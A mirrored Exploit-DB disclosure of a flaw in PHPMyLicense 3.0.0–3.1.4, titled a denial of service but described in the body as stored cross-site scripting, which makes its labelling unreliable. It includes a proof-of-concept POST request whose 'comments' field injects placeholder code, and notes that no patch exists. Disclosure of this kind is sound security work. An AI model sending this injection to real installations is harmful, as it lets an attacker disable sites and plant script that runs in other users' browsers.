PHPMyLicense 3.0.0 < 3.1.4 - Denial of Service

• Exploit Database
• 107 阅读

• 作者： Aria Akhavan Rezayat
  日期： 2015-10-11
• 类别：

  • dos
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38442/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  Hello, I want to report following exploit:     # Exploit Title: PHPMyLicense Stored Cross Site Scripting # Date: 09-10-2015 # Exploit Author: Aria Akhavan Rezayat @ Websec GesmbH # Website: https://websec-test.com # Vendor Homepage: https://phpmylicense.com # Software Link: http://codecanyon.net/item/phpmylicense/11719122 # Version: 3.0.0 - 3.1.4 (REQUIRED) # Category: Webapps   1.) Description:   Any registered user can simply disable functionality of the whole application and input malicious code because of a lack of filtering.   2.) Proof of Concept:   localhost/phpmylicense/ajax/   POST:   comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla&expirydate=26-10-2014&handler=newlicense&parameters=bla&productid=20&serialkey=bla&status=processing   3.) Solution:   None. - No Update available for it.